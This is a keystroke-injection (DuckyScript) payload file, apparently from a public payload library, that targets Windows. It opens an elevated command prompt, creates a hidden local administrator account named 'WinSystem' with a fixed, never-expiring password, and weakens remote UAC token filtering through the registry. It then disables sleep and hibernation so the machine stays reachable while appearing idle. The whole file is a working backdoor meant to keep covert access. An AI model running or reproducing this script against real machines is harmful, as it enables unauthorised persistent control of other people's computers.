Path: blob/master/payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt
3018 views
REM Title: Admin who never sleeps1REM Desc: Adds a local hidden admin user and sets power settings to never sleep.2REM Author: UberGuidoZ3REM Target: Windows (local admin required)45REM Launch admin-level CMD prompt6DELAY 30007GUI r8DELAY 10009STRING cmd10DELAY 50011CTRL-SHIFT ENTER12DELAY 100013LEFTARROW14DELAY 25015ENTER16DELAY 15001718REM Create local admin user WinSystem with pass Some-P@ssw0rd19STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add20ENTER21DELAY 15002223REM Set WinSystem user pass to never expire, skip UAC, and hide the user24STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 025ENTER26DELAY 15002728REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)2930STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 031ENTER32DELAY 100033STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 034ENTER35DELAY 100036STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 037ENTER38DELAY 10003940REM Set monitor timeouts to avoid noticing system is awake41STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 1042ENTER43DELAY 10004445REM Exit and enjoy your user whenever!46EXIT474849